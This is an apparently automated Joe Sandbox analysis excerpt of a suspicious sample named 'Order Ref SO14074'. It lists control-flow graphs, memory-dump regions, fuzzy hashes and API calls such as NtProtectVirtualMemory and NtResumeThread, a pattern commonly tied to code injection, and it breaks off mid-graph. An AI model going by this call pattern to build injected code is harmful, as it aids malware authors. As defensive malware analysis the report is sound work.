2101->2131 2107->2108 2108->2099 2120 72265d0-7226668 2118->2120 2121 7226669-7226681 2118->2121 2119->2118 2120->2121 2121->2068 2130->2096 2131->2130
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: fhq$8
                                • API String ID: 0-3528958667
                                • Opcode ID: 13391eeeb9293c24357980d1cc0d86365af27432acf2ed716f0a310053b8e607
                                • Instruction ID: 5d5f06fbb11a3f8ca17f13c926d6c71aae77cfcae789e35512dfad9b9315408c
                                • Opcode Fuzzy Hash: 13391eeeb9293c24357980d1cc0d86365af27432acf2ed716f0a310053b8e607
                                • Instruction Fuzzy Hash: DA52D4B5E002299FDB64DF69C854BD9B7B1FB89310F5082AAD90DA7354DB30AE81CF50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2381 650b9f0-650ba1b 2382 650ba22-650ba74 2381->2382 2383 650ba1d 2381->2383 2386 650ba77-650ba7d 2382->2386 2383->2382 2387 650ba86-650ba87 2386->2387 2388 650ba7f 2386->2388 2389 650bad8-650bb14 2387->2389 2388->2387 2388->2389 2390 650ba89-650ba99 2388->2390 2396 650bb20-650bb26 2389->2396 2397 650bb16-650bb1e 2389->2397 2393 650baa5-650bace 2390->2393 2393->2386 2395 650bad0-650bad6 2393->2395 2395->2386 2398 650bb28 2396->2398 2399 650bb2f-650bb30 2396->2399 2397->2396 2398->2399 2400 650bb32-650bb61 2398->2400 2401 650bcd3-650bd86 call 650b798 2398->2401 2402 650bb63-650bbf6 call 650b798 2398->2402 2403 650bd99-650bdde 2398->2403 2404 650bbfb-650bcc2 2398->2404 2405 650be9f-650bec1 2398->2405 2399->2400 2400->2396 2401->2396 2482 650bd8c-650bd94 2401->2482 2402->2396 2440 650bde0-650bde6 2403->2440 2441 650bde8-650bded 2403->2441 2404->2396 2488 650bcc8-650bcce 2404->2488 2408 650bec3-650becb 2405->2408 2409 650be8d-650be93 2405->2409 2408->2409 2413 650be95 2409->2413 2414 650be9c-650be9d 2409->2414 2413->2405 2413->2414 2417 650bf34-650bf51 2413->2417 2418 650c234-650c235 2413->2418 2419 650bfd6 2413->2419 2420 650bf87-650bfcc 2413->2420 2421 650c168-650c169 2413->2421 2422 650c10b-650c159 2413->2422 2423 650c1db-650c227 2413->2423 2424 650c09c-650c09d 2413->2424 2425 650becd-650beee 2413->2425 2426 650c03f-650c08d 2413->2426 2414->2405 2432 650bfd7 2417->2432 2439 650bf57-650bf6b 2417->2439 2453 650c236 2418->2453 2419->2432 2449 650bf75-650bf7b 2420->2449 2474 650bfce-650bfd4 2420->2474 2447 650c1c6-650c1cf 2421->2447 2445 650c0f6-650c0ff 2422->2445 2477 650c15b-650c166 2422->2477 2423->2447 2472 650c229-650c232 2423->2472 2424->2445 2462 650befa-650bf23 2425->2462 2444 650c02a-650c033 2426->2444 2476 650c08f-650c09a 2426->2476 2432->2444 2439->2449 2450 650bf6d-650bf73 2439->2450 2440->2441 2451 650bdf2-650be40 2441->2451 2452 650bdef-650bdf0 2441->2452 2454 650c035 2444->2454 2455 650c03c-650c03d 2444->2455 2457 650c101 2445->2457 2458 650c108-650c109 2445->2458 2460 650c1d1 2447->2460 2461 650c1d8-650c1d9 2447->2461 2464 650bf84-650bf85 2449->2464 2465 650bf7d 2449->2465 2450->2449 2483 650be42-650be48 2451->2483 2484 650be4a-650be4f 2451->2484 2452->2451 2453->2453 2454->2418 2454->2421 2454->2422 2454->2423 2454->2424 2454->2426 2455->2426 2457->2418 2457->2421 2457->2422 2457->2423 2458->2422 2460->2418 2460->2423 2461->2418 2461->2423 2462->2409 2470 650bf29-650bf2f 2462->2470 2464->2420 2465->2418 2465->2419 2465->2420 2465->2421 2465->2422 2465->2423 2465->2424 2465->2426 2465->2464 2470->2409 2472->2447 2474->2449 2476->2444 2477->2445 2482->2396 2483->2484 2485 650be51-650be52 2484->2485 2486 650be54-650be77 call 650c799 2484->2486 2485->2486 2490 650be7d-650be8a 2486->2490 2488->2396 2490->2409
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2200454073.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6500000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: Tecq$Tecq
                                • API String ID: 0-2088518435
                                • Opcode ID: f3e5f39f529e6a6624ac7d0149c4342cc9544fd56a43ab88c177782a850b1789
                                • Instruction ID: a0726e89f8af4205d46d11fd448ddd0cc0fff215f1b89b6bd24374919544aca2
                                • Opcode Fuzzy Hash: f3e5f39f529e6a6624ac7d0149c4342cc9544fd56a43ab88c177782a850b1789
                                • Instruction Fuzzy Hash: 9F122874E05218CFEB94DF68C885BA9B7F6FB89300F5081A9D909E7284DB359D85CF01

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2493 650b9e0-650ba1b 2495 650ba22-650ba74 2493->2495 2496 650ba1d 2493->2496 2499 650ba77-650ba7d 2495->2499 2496->2495 2500 650ba86-650ba87 2499->2500 2501 650ba7f 2499->2501 2502 650bad8-650bb14 2500->2502 2501->2500 2501->2502 2503 650ba89-650ba99 2501->2503 2509 650bb20-650bb26 2502->2509 2510 650bb16-650bb1e 2502->2510 2506 650baa5-650bace 2503->2506 2506->2499 2508 650bad0-650bad6 2506->2508 2508->2499 2511 650bb28 2509->2511 2512 650bb2f-650bb30 2509->2512 2510->2509 2511->2512 2513 650bb32-650bb61 2511->2513 2514 650bcd3-650bd86 call 650b798 2511->2514 2515 650bb63-650bbf6 call 650b798 2511->2515 2516 650bd99-650bdde 2511->2516 2517 650bbfb-650bcc2 2511->2517 2518 650be9f-650bec1 2511->2518 2512->2513 2513->2509 2514->2509 2595 650bd8c-650bd94 2514->2595 2515->2509 2553 650bde0-650bde6 2516->2553 2554 650bde8-650bded 2516->2554 2517->2509 2601 650bcc8-650bcce 2517->2601 2521 650bec3-650becb 2518->2521 2522 650be8d-650be93 2518->2522 2521->2522 2526 650be95 2522->2526 2527 650be9c-650be9d 2522->2527 2526->2518 2526->2527 2530 650bf34-650bf51 2526->2530 2531 650c234-650c235 2526->2531 2532 650bfd6 2526->2532 2533 650bf87-650bfcc 2526->2533 2534 650c168-650c169 2526->2534 2535 650c10b-650c159 2526->2535 2536 650c1db-650c227 2526->2536 2537 650c09c-650c09d 2526->2537 2538 650becd-650beee 2526->2538 2539 650c03f-650c08d 2526->2539 2527->2518 2545 650bfd7 2530->2545 2552 650bf57-650bf6b 2530->2552 2566 650c236 2531->2566 2532->2545 2562 650bf75-650bf7b 2533->2562 2587 650bfce-650bfd4 2533->2587 2560 650c1c6-650c1cf 2534->2560 2558 650c0f6-650c0ff 2535->2558 2590 650c15b-650c166 2535->2590 2536->2560 2585 650c229-650c232 2536->2585 2537->2558 2575 650befa-650bf23 2538->2575 2557 650c02a-650c033 2539->2557 2589 650c08f-650c09a 2539->2589 2545->2557 2552->2562 2563 650bf6d-650bf73 2552->2563 2553->2554 2564 650bdf2-650be40 2554->2564 2565 650bdef-650bdf0 2554->2565 2567 650c035 2557->2567 2568 650c03c-650c03d 2557->2568 2570 650c101 2558->2570 2571 650c108-650c109 2558->2571 2573 650c1d1 2560->2573 2574 650c1d8-650c1d9 2560->2574 2577 650bf84-650bf85 2562->2577 2578 650bf7d 2562->2578 2563->2562 2596 650be42-650be48 2564->2596 2597 650be4a-650be4f 2564->2597 2565->2564 2566->2566 2567->2531 2567->2534 2567->2535 2567->2536 2567->2537 2567->2539 2568->2539 2570->2531 2570->2534 2570->2535 2570->2536 2571->2535 2573->2531 2573->2536 2574->2531 2574->2536 2575->2522 2583 650bf29-650bf2f 2575->2583 2577->2533 2578->2531 2578->2532 2578->2533 2578->2534 2578->2535 2578->2536 2578->2537 2578->2539 2578->2577 2583->2522 2585->2560 2587->2562 2589->2557 2590->2558 2595->2509 2596->2597 2598 650be51-650be52 2597->2598 2599 650be54-650be77 call 650c799 2597->2599 2598->2599 2603 650be7d-650be8a 2599->2603 2601->2509 2603->2522
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2200454073.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6500000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: Tecq$Tecq
                                • API String ID: 0-2088518435
                                • Opcode ID: 6f05e9796b4e878314a4904a5cf3b296273e84d933889d4039c6cab6304062f6
                                • Instruction ID: 6639125f24a634b0c22649bd05f8a72e3b9940439e20e2cd529bf0e3145d49e4
                                • Opcode Fuzzy Hash: 6f05e9796b4e878314a4904a5cf3b296273e84d933889d4039c6cab6304062f6
                                • Instruction Fuzzy Hash: 49122474E05218CFEB94DF68C885BA9BBF2FB89300F5081A9D909E7284DB359D85CF01
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2200454073.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6500000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: '+$Tecq
                                • API String ID: 0-2813902301
                                • Opcode ID: 4397ccd97cd0dbde8dfd6059f35c4a5a334f5bed897ee8e1a6203d4bd5b21b2e
                                • Instruction ID: b030725844a4bad5754b20cfe46bfd26cccc45bb466c0baf5b563a6118498902
                                • Opcode Fuzzy Hash: 4397ccd97cd0dbde8dfd6059f35c4a5a334f5bed897ee8e1a6203d4bd5b21b2e
                                • Instruction Fuzzy Hash: F0B1F5B4E05219CFEB54CFA9D984B9DBBF2BF89300F1084A9D409AB295DB349D85CF40
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2200454073.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6500000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: '+$Tecq
                                • API String ID: 0-2813902301
                                • Opcode ID: 4d3fac4865df7bb0314d5d1874e9baad2b43c30893f037761015c3be375bb6d8
                                • Instruction ID: f5ca7f00d0dd037e15ce4ccefa5147d5ec1c19d6f0d8e53442d714b685fc45fe
                                • Opcode Fuzzy Hash: 4d3fac4865df7bb0314d5d1874e9baad2b43c30893f037761015c3be375bb6d8
                                • Instruction Fuzzy Hash: 36B1E4B4E01219CFEB54CFA9D984B9DBBF2BF89300F2084A9D409A7395DB749985CF40
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: fhq$h
                                • API String ID: 0-3107779391
                                • Opcode ID: 480f996a1846596f859204a7b459dcf3ff2cf978ddb23b86d5f213927391d7be
                                • Instruction ID: 867f8972501024384904912b002717a6ef3d3a66f0c4ac4bc7a329a4c49a9fa4
                                • Opcode Fuzzy Hash: 480f996a1846596f859204a7b459dcf3ff2cf978ddb23b86d5f213927391d7be
                                • Instruction Fuzzy Hash: 66712475E00629DBDB24DF69C840BD9BBB2FF89300F1082AAD90DA7254DB309E85CF51
                                APIs
                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 07229131
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: MemoryProtectVirtual
                                • String ID:
                                • API String ID: 2706961497-0
                                • Opcode ID: 4e47f32d60e59a158f06fe73450ec4ccd80e49035fea292150bc6fa12a64a3ef
                                • Instruction ID: 68482ae5c32f6988f07261be7fb7ee03641fe951503444b9b9c52433c22b2248
                                • Opcode Fuzzy Hash: 4e47f32d60e59a158f06fe73450ec4ccd80e49035fea292150bc6fa12a64a3ef
                                • Instruction Fuzzy Hash: 6B2127B5D003499FCB10CFAAD885ADEFBF4FF88310F20842AE559A3210C775A955CBA1
                                APIs
                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 07229131
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: MemoryProtectVirtual
                                • String ID:
                                • API String ID: 2706961497-0
                                • Opcode ID: 29d69f152b7fb2b670a817d854d0dc24749aea30ed14fd8f37554b0fadd9ccb5
                                • Instruction ID: a8fe4ee58024a99b483d2242cc2ac0e4341cded2f3717fb5a7e77910842ff4cf
                                • Opcode Fuzzy Hash: 29d69f152b7fb2b670a817d854d0dc24749aea30ed14fd8f37554b0fadd9ccb5
                                • Instruction Fuzzy Hash: F12112B1D013499FCB10DFAAD884ADEFBF5FF88310F60842AE419A7210C775A941CBA1
                                APIs
                                • NtResumeThread.NTDLL(?,?), ref: 0722B67E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 66c792ff52b7dccfd93e371f2de37621f533891058c8087fba858a768b319dce
                                • Instruction ID: dd81165409389039b5532aa0a20509c50a2be39980b49efd621bb6e0d0b8ffb6
                                • Opcode Fuzzy Hash: 66c792ff52b7dccfd93e371f2de37621f533891058c8087fba858a768b319dce
                                • Instruction Fuzzy Hash: EC1138B1D102099FCB20DFAAC4446AEFBF4FB89324F50842AD419A3240CB789945CFA5
                                APIs
                                • NtResumeThread.NTDLL(?,?), ref: 0722B67E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 6162609b4fcfc41cfd163f1f1e8249765cd876b26cbe0887e830b5d8313f45ad
                                • Instruction ID: b8f3f58d0b8d1916a180c9ec8e1f098e947b204bae8a4d98407efc25b2d12d8c
                                • Opcode Fuzzy Hash: 6162609b4fcfc41cfd163f1f1e8249765cd876b26cbe0887e830b5d8313f45ad
                                • Instruction Fuzzy Hash: 331117B1D003199FDB10DFAAC4446AEFBF4EF89324F50842ED419A7240C778A945CFA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204665157.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7190000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: PHcq
                                • API String ID: 0-4245845256
                                • Opcode ID: 517e6ef98142a09f637350d3f684b5baf2c2158374fcade03fa7b8446d9662f5
                                • Instruction ID: 2c606587f418e372003eabda3d91f64df39224089e5019765ae7b1c2de5eb3a0
                                • Opcode Fuzzy Hash: 517e6ef98142a09f637350d3f684b5baf2c2158374fcade03fa7b8446d9662f5
                                • Instruction Fuzzy Hash: F4C135B4E15208CFDB65CFA8D845BADBBF2BB8A301F218069D409B72C5DB745986CF01
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204717196.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_71a0000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 84bc7abfecf063950e086250f92d3841725082f3a7de310afcbb6d5e2842a9b8
                                • Instruction ID: 5e385fa7bc093b8f17230e844f3536ddc819f6ffc2f930d90eb69b8447add162
                                • Opcode Fuzzy Hash: 84bc7abfecf063950e086250f92d3841725082f3a7de310afcbb6d5e2842a9b8
                                • Instruction Fuzzy Hash: 7052D4B4A106298FCB64DF28C984B9ABBB5FB49301F1181D9D90DA7395DB34AEC1CF50
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204768820.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7220000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a0df29217c627467910bf11371a36fb5be3773b2e06a61cdd83d644cc64adb18
                                • Instruction ID: 8a20a94a8f8b3d29e624177eaf56d167af14e73164a5afbdad92eb3aa28e81a1
                                • Opcode Fuzzy Hash: a0df29217c627467910bf11371a36fb5be3773b2e06a61cdd83d644cc64adb18
                                • Instruction Fuzzy Hash: EF7109B4E11219DFDB04DFA9D440AAEBBF6FF89300F548029E509A7394DB34A945CF51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1296 2a7c5b0-2a7c64f GetCurrentProcess 1301 2a7c651-2a7c657 1296->1301 1302 2a7c658-2a7c68c GetCurrentThread 1296->1302 1301->1302 1303 2a7c695-2a7c6c9 GetCurrentProcess 1302->1303 1304 2a7c68e-2a7c694 1302->1304 1306 2a7c6d2-2a7c6ea 1303->1306 1307 2a7c6cb-2a7c6d1 1303->1307 1304->1303 1318 2a7c6ed call 2a7cb99 1306->1318 1319 2a7c6ed call 2a7cf78 1306->1319 1307->1306 1309 2a7c6f3-2a7c722 GetCurrentThreadId 1311 2a7c724-2a7c72a 1309->1311 1312 2a7c72b-2a7c78d 1309->1312 1311->1312 1318->1309 1319->1309
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 02A7C63E
                                • GetCurrentThread.KERNEL32 ref: 02A7C67B
                                • GetCurrentProcess.KERNEL32 ref: 02A7C6B8
                                • GetCurrentThreadId.KERNEL32 ref: 02A7C711
                                Memory Dump Source
                                • Source File: 00000000.00000002.2182244636.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2a70000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 41b8d9bbc45f2ba78080eb4dd3bbbaadaf4f2ac2eabf402bbedfaea16f5cff19
                                • Instruction ID: d21811bfbba2bb2a5fc1f2dbc4c88f4dff9d20d09be7591c81c459abc01f93b9
                                • Opcode Fuzzy Hash: 41b8d9bbc45f2ba78080eb4dd3bbbaadaf4f2ac2eabf402bbedfaea16f5cff19
                                • Instruction Fuzzy Hash: 0E5167B0D003098FDB54DFA9D988BAEBBF1EB88314F24845AE419A7390DB345984CB65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1320 2a7c5c0-2a7c64f GetCurrentProcess 1324 2a7c651-2a7c657 1320->1324 1325 2a7c658-2a7c68c GetCurrentThread 1320->1325 1324->1325 1326 2a7c695-2a7c6c9 GetCurrentProcess 1325->1326 1327 2a7c68e-2a7c694 1325->1327 1329 2a7c6d2-2a7c6ea 1326->1329 1330 2a7c6cb-2a7c6d1 1326->1330 1327->1326 1341 2a7c6ed call 2a7cb99 1329->1341 1342 2a7c6ed call 2a7cf78 1329->1342 1330->1329 1332 2a7c6f3-2a7c722 GetCurrentThreadId 1334 2a7c724-2a7c72a 1332->1334 1335 2a7c72b-2a7c78d 1332->1335 1334->1335 1341->1332 1342->1332
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 02A7C63E
                                • GetCurrentThread.KERNEL32 ref: 02A7C67B
                                • GetCurrentProcess.KERNEL32 ref: 02A7C6B8
                                • GetCurrentThreadId.KERNEL32 ref: 02A7C711
                                Memory Dump Source
                                • Source File: 00000000.00000002.2182244636.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2a70000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: cff112fbf0793a0eb442f3cc005f2c68d34cc0859a864168537584e601377313
                                • Instruction ID: 1eebc210bf33e07564ad66d67ddeea9a1de9529f0efedb277e6235fcb3b3dd0f
                                • Opcode Fuzzy Hash: cff112fbf0793a0eb442f3cc005f2c68d34cc0859a864168537584e601377313
                                • Instruction Fuzzy Hash: 125168B0D107098FDB14DFA9D988BAEBBF1EF88314F208459E409A7390DB345984CF65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1343 7245d48-7245d70 1345 7245d72-7245db9 1343->1345 1346 7245dbe-7245dcc 1343->1346 1394 7246215-724621c 1345->1394 1347 7245dce-7245dd9 call 7243870 1346->1347 1348 7245ddb 1346->1348 1350 7245ddd-7245de4 1347->1350 1348->1350 1353 7245ecd-7245ed1 1350->1353 1354 7245dea-7245dee 1350->1354 1358 7245f27-7245f31 1353->1358 1359 7245ed3-7245ee2 call 7241aa0 1353->1359 1355 7245df4-7245df8 1354->1355 1356 724621d-7246245 1354->1356 1361 7245e0a-7245e68 call 72435b0 call 7244018 1355->1361 1362 7245dfa-7245e04 1355->1362 1367 724624c-7246276 1356->1367 1363 7245f33-7245f42 call 7241248 1358->1363 1364 7245f6a-7245f90 1358->1364 1371 7245ee6-7245eeb 1359->1371 1403 7245e6e-7245ec8 1361->1403 1404 72462db-7246305 1361->1404 1362->1361 1362->1367 1380 724627e-7246294 1363->1380 1381 7245f48-7245f65 1363->1381 1389 7245f92-7245f9b 1364->1389 1390 7245f9d 1364->1390 1367->1380 1375 7245ee4 1371->1375 1376 7245eed-7245f22 call 7245c18 1371->1376 1375->1371 1376->1394 1406 724629c-72462d4 1380->1406 1381->1394 1396 7245f9f-7245fc7 1389->1396 1390->1396 1408 7245fcd-7245fe6 1396->1408 1409 7246098-724609c 1396->1409 1403->1394 1413 7246307-724630d 1404->1413 1414 724630f-7246315 1404->1414 1406->1404 1408->1409 1434 7245fec-7245ffb call 7241070 1408->1434 1415 7246116-7246120 1409->1415 1416 724609e-72460b7 1409->1416 1413->1414 1421 7246316-7246353 1413->1421 1418 7246122-724612c 1415->1418 1419 724617d-7246186 1415->1419 1416->1415 1438 72460b9-72460c8 call 7241070 1416->1438 1435 7246132-7246144 1418->1435 1436 724612e-7246130 1418->1436 1423 72461be-724620b 1419->1423 1424 7246188-72461b6 call 7242dc0 call 7242de0 1419->1424 1444 7246213 1423->1444 1424->1423 1452 7246013-7246028 1434->1452 1453 7245ffd-7246003 1434->1453 1441 7246146-7246148 1435->1441 1436->1441 1459 72460e0-72460eb 1438->1459 1460 72460ca-72460d0 1438->1460 1449 7246176-724617b 1441->1449 1450 724614a-724614e 1441->1450 1444->1394 1449->1418 1449->1419 1455 7246150-7246169 1450->1455 1456 724616c-724616f 1450->1456 1465 724605c-7246065 1452->1465 1466 724602a-7246056 call 7241f10 1452->1466 1461 7246005 1453->1461 1462 7246007-7246009 1453->1462 1455->1456 1456->1449 1459->1404 1471 72460f1-7246114 1459->1471 1469 72460d4-72460d6 1460->1469 1470 72460d2 1460->1470 1461->1452 1462->1452 1465->1404 1468 724606b-7246092 1465->1468 1466->1406 1466->1465 1468->1409 1468->1434 1469->1459 1470->1459 1471->1415 1471->1438
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204858948.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7240000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: Hgq$Hgq$Hgq
                                • API String ID: 0-3310009463
                                • Opcode ID: 42c2be28698138aa5961a7b8f3bffbd24c559a22fa04408df21e8b4074981b15
                                • Instruction ID: 21f9d98a683f083c765c59744b3b7fc936d944170d929c4dcee99febd193c777
                                • Opcode Fuzzy Hash: 42c2be28698138aa5961a7b8f3bffbd24c559a22fa04408df21e8b4074981b15
                                • Instruction Fuzzy Hash: AE127EB0A10206DFCB29DFA5C854AAEB7F6FF89300F14852DD50A9B391DB71AC45CB50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1484 7247b78-7247bb5 1486 7247bd7-7247bed call 7247980 1484->1486 1487 7247bb7-7247bba 1484->1487 1493 7247f63-7247f77 1486->1493 1494 7247bf3-7247bff 1486->1494 1600 7247bbc call 7248490 1487->1600 1601 7247bbc call 72484e8 1487->1601 1490 7247bc2-7247bc4 1490->1486 1491 7247bc6-7247bce 1490->1491 1491->1486 1502 7247fb7-7247fc0 1493->1502 1495 7247c05-7247c08 1494->1495 1496 7247d30-7247d37 1494->1496 1497 7247c0b-7247c14 1495->1497 1498 7247e66-7247ea0 call 7247388 1496->1498 1499 7247d3d-7247d46 1496->1499 1503 7248058 1497->1503 1504 7247c1a-7247c2e 1497->1504 1598 7247ea3 call 724a320 1498->1598 1599 7247ea3 call 724a330 1498->1599 1499->1498 1501 7247d4c-7247e58 call 7247388 call 7247918 call 7247388 1499->1501 1595 7247e63-7247e64 1501->1595 1596 7247e5a 1501->1596 1506 7247f85-7247f8e 1502->1506 1507 7247fc2-7247fc9 1502->1507 1508 724805d-7248061 1503->1508 1520 7247c34-7247cc9 call 7247980 * 2 call 7247388 call 7247918 call 72479c0 call 7247a68 call 7247ad0 1504->1520 1521 7247d20-7247d2a 1504->1521 1506->1503 1516 7247f94-7247fa6 1506->1516 1511 7248017-724801e 1507->1511 1512 7247fcb-724800e call 7247388 1507->1512 1513 7248063 1508->1513 1514 724806c 1508->1514 1517 7248020-7248030 1511->1517 1518 7248043-7248056 1511->1518 1512->1511 1513->1514 1526 724806d 1514->1526 1528 7247fb6 1516->1528 1529 7247fa8-7247fad 1516->1529 1517->1518 1533 7248032-724803a 1517->1533 1518->1508 1574 7247ce8-7247d1b call 7247ad0 1520->1574 1575 7247ccb-7247ce3 call 7247a68 call 7247388 call 7247638 1520->1575 1521->1496 1521->1497 1526->1526 1528->1502 1602 7247fb0 call 724aad0 1529->1602 1603 7247fb0 call 724aac1 1529->1603 1533->1518 1543 7247ea9-7247f5a call 7247388 1543->1493 1574->1521 1575->1574 1595->1498 1596->1595 1598->1543 1599->1543 1600->1490 1601->1490 1602->1528 1603->1528
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2204858948.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7240000_Order Ref SO14074.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'cq$4'cq$4'cq
                                • API String ID: 0-1854722736
                                • Opcode ID: 6084ab2fff3d62e3bb7a0b000f16f9507ae6f3e9c7cae2d9f15343f14d4d7ae0
                                • Instruction ID: c1b6073acabf6cbe8ebb8d169fc06803c84949badbc5ea70b0835e970943c1e6
                                • Opcode Fuzzy Hash: 6084ab2fff3d62e3bb7a0b000f16f9507ae6f3e9c7cae2d9f15343f14d4d7ae0
                                • Instruction Fuzzy Hash: 29F1FD74A20219DFCB08DFA4D998E9DB7B2FF89300F118558E506AB3A5DB71EC42CB51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1604 724c160-724c170 1605 724c176-724c17a 1604->1605 1606 724c289-724c2ae 1604->1606 1607 724c2b5-724c2da 1605->1607 1608 724c180-724c189 1605->1608 1606->1607 1609 724c2e1-724c317 1607->1609 1608->1609 1610 724c18f-724c1b6 1608->1610 1626 724c31e-724c374 1609->1626 1620 724c1bc-724c1be 1610->1620 1621 724c27e-724c288 1610->1621 1624 724c1c0-724c1c3 1620->1624 1625 724c1df-724c1e1 1620->1625 1624->1626 1627 724c1c9-724c1d3 1624->1627 1628 724c1e4-724c1e8 1625->1628 1642 724c376-724c38a 1626->1642 1643 724c398-724c3af 1626->1643 1627->1626 1630 724c1d9-724c1dd 1627->1630 1631 724c249-724c255 1628->1631 1632 724c1ea-724c1f9 1628->1632 1630->1625 1630->1628 1631->1626 1633 724c25b-724c278 1631->1633 1632->1626 1638 724c1ff-724c246 1632->1638 1633->1620 1633->1621 1638->1631 1718 724c38d call 724c878 1642->1718 1719 724c38d call 724c9d9 1642->1719 1652 724c3b5-724c49b call 7247980 call 7247388 * 2 call 72479c0 call 724b198 call 7247388 call 724a330 call 7248228 1643->1652 1653 724c4a0-724c4b0 1643->1653 1648 724c393 1650 724c5c3-724c5ce 1648->1650 1660 724c5d0-724c5e0 1650->1660 1661 724c5fd-724c61e call 7247ad0 1650->1661 1652->1653 1662 724c4b6-724c590 call 7247980 * 2 call 7248138 call 7247388 * 2 call 7247638 call 7247ad0 call 7247388 1653->1662 1663 724c59e-724c5ba call 7247388 1653->1663 1673 724c5f0-724c5f8 call 7248228 1660->1673 1674 724c5e2-724c5e8 1660->1674 1715 724c592 1662->1715 1716 724c59b 1662->1716 